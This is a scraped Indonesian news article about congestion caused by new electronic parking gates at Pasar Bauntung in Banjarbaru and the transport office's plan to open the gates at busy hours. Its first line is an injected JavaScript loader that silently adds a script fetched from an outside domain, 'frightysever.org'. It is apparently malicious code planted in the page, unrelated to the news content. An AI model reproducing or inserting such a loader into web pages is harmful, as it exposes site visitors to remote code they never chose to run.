(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Solusi Sementara Kemacetan Pasar Bauntung, Dishub Banjarbaru Buka Portal Saat Jam Sibuk!


KANALKALIMANTAN.COM, BANJARBARU – Kemacetan yang terjadi di pintu keluar parkir Pasar Bauntung Banjarbaru imbas penerapan parkir elektronik yang diprotes pedagang dan pengunjung pasar, Kamis (8/7/2021), direspons Pemko Banjarbaru.

Sekretaris Daerah Kota Banjarbaru Said Abdullah bersama Kepala Dinas Perhubungan (Dishub) Kota Banjarbaru, Ahmad Yani Makkie melakukan pemantauan langsung di lapangan, beberapa saat setelah peristiwa itu.

“Hari pertama diberlakukan uji portal parkir maka tak heran pasti akan ada plus dan minusnya, karena ini masih baru pertama,” jelas Yani Makkie, kepada Kanalkalimantan.com, Kamis siang.

Baca juga: Pedagang Protes! Sistem Parkir Elektronik Bikin Macet di Pasar Bauntung Banjarbaru

 

 

Permasalahan teknis sederhana seperti transaksi yang memakan waktu lebih lama diduga salah satunya. Yani Makkie juga mengatakan akan terus mengevaluasi lagi efektivitas penggunaan portal.

Ia mengatakan, sudah bertemu dengan perwakilan beberapa pedagang untuk memberikan solusi yang sama diharapkan pedagang.

Selanjutnya untuk menghindari kejadian serupa, pihaknya bersama pengelola pasar juga sepakat jika portal akan dibuka pada jam sibuk. Namun tetap ada pembayaran parkir.

Baca juga: Vaksinasi Dosis Kedua Peyandang Disabilitas dan Lansia di Banjarbaru

“Portal di pintu masuk juga akan kita geser ke dalam dan pengelola bersedia menambah satu portal di pintu masuk dan keluar,” terangnya.

Namun demikian, lanjut Yani Makkie, tentunya proses pengadaan portal baru perlu waktu. Sehingga solusi buka portal di jam sibuk akan diterapkan lebih dulu.

“Sudah ketemu dengan perwakilan beberapa pedagang tadi, untuk memberikan solusi, dan solusi yang kami tawarkan sama dengan keinginan mereka, bila di jam-jam sibuk portal pintu keluar akan kita buka untuka mengurai kemacetan,” ujar Kadishub kepada Kanalkalimantan.com.

Portal di pintu masuk juga akan digeser lebih ke dalam dan pengelola bersedia menambah 1 portal di pintu masuk dan keluar.

Jadi jumlahnya ke depan ada 6 portal, pintu masuk 3 pintu keluar 3, ini tentunya perlu proses, sambil menunggu alatnya dalam proses pembelian.

“Kita gunakan opsi pembukaan portal di pintu keluar untuk mengurai kemacetan seperti pagi tadi. Insyaallah semua ada solusi terbaik dan tidak akan merugikan pedagang, intinya kami siap setiap saat mengevaluasinya,” pungkasnya. (kanalkalimantan.com/dewi)

Reporter: dewi
Editor: cell


Al Ghifari

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

11 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

11 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

12 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

16 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

18 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

18 jam ago

This website uses cookies.